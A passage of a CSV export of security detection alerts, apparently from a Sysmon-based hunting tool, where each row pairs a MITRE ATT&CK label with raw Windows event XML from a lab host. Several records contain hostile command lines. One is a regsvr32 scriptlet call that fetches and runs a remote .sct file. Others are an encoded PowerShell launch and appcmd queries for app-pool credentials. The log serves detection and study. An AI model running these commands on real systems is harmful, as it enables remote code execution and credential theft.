<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.150</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00101760FF00</Data>
<Data Name=""ProcessId"">2104</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;ERROR ( message:Configuration error &quot; /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /user) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:00:09.977481Z"">
</TimeCreated>
<EventRecordID>24</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
<Data Name=""UtcTime"">2019-04-18 17:00:09.677</Data>
<Data Name=""ProcessGuid"">365ABB72-AD19-5CB8-0000-0010F4F40C00</Data>
<Data Name=""ProcessId"">3980</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
<Data Name=""LogonId"">0xca21</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ParentProcessId"">1200</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">Powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1555606894.168542,2019-04-18T21:01:34.168542+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /user ) contains suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:00:09.977481Z"">
</TimeCreated>
<EventRecordID>24</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
<Data Name=""UtcTime"">2019-04-18 17:00:09.677</Data>
<Data Name=""ProcessGuid"">365ABB72-AD19-5CB8-0000-0010F4F40C00</Data>
<Data Name=""ProcessId"">3980</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
<Data Name=""LogonId"">0xca21</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ParentProcessId"">1200</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">Powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-13T18:03:19.681478Z"">
</TimeCreated>
<EventRecordID>17287</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""276"" ThreadID=""1000"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-13 18:03:19.497</Data>
<Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-001062160C00</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0EC-5CD9-0000-00201D340100</Data>
<Data Name=""LogonId"">0x1341d</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0EC-5CD9-0000-0010D9D20000</Data>
<Data Name=""ParentProcessId"">944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-13T18:03:19.681478Z"">
</TimeCreated>
<EventRecordID>17287</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""276"" ThreadID=""1000"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-13 18:03:19.497</Data>
<Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-001062160C00</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0EC-5CD9-0000-00201D340100</Data>
<Data Name=""LogonId"">0x1341d</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0EC-5CD9-0000-0010D9D20000</Data>
<Data Name=""ParentProcessId"">944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557770599.895876,2019-05-13T22:03:19.895876+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-13T18:03:19.681478Z"">
</TimeCreated>
<EventRecordID>17287</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""276"" ThreadID=""1000"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-13 18:03:19.497</Data>
<Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-001062160C00</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0EC-5CD9-0000-00201D340100</Data>
<Data Name=""LogonId"">0x1341d</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0EC-5CD9-0000-0010D9D20000</Data>
<Data Name=""ParentProcessId"">944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T20:18:09.643112Z"">
</TimeCreated>
<EventRecordID>5275</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1852"" ThreadID=""464"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-17 20:18:09.593</Data>
<Data Name=""ProcessGuid"">365ABB72-AB81-5C8E-0000-00102E9E0C00</Data>
<Data Name=""ProcessId"">3892</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">PC04\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-A960-5C8E-0000-002004C00300</Data>
<Data Name=""LogonId"">0x3c004</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-173D-5C8F-0000-00102A6A0000</Data>
<Data Name=""ParentProcessId"">608</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T20:18:09.643112Z"">
</TimeCreated>
<EventRecordID>5275</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1852"" ThreadID=""464"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-17 20:18:09.593</Data>
<Data Name=""ProcessGuid"">365ABB72-AB81-5C8E-0000-00102E9E0C00</Data>
<Data Name=""ProcessId"">3892</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">PC04\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-A960-5C8E-0000-002004C00300</Data>
<Data Name=""LogonId"">0x3c004</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-173D-5C8F-0000-00102A6A0000</Data>
<Data Name=""ParentProcessId"">608</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1552853889.653126,2019-03-18T00:18:09.653126+04:00,,Threat,High,"Found User (PC04\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T20:18:09.643112Z"">
</TimeCreated>
<EventRecordID>5275</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1852"" ThreadID=""464"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-17 20:18:09.593</Data>
<Data Name=""ProcessGuid"">365ABB72-AB81-5C8E-0000-00102E9E0C00</Data>
<Data Name=""ProcessId"">3892</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">PC04\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-A960-5C8E-0000-002004C00300</Data>
<Data Name=""LogonId"">0x3c004</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=C648901695E275C8F2AD04B687A68CE2,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-173D-5C8F-0000-00102A6A0000</Data>
<Data Name=""ParentProcessId"">608</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.110469,2019-05-27T05:29:17.110469+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppools /text:name ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.110469Z"">
</TimeCreated>
<EventRecordID>5880</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.070</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-0010575CFF00</Data>
<Data Name=""ProcessId"">2644</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppools /text:name</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606809.977481,2019-04-18T21:00:09.977481+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:14.871968Z"">
</TimeCreated>
<EventRecordID>23</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:14.781</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\vaultcli.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Credential Vault Client Library</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557770599.681478,2019-05-13T22:03:19.681478+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-13T18:03:19.681478Z"">
</TimeCreated>
<EventRecordID>17286</EventRecordID>
<Correlation>
</Correlation>
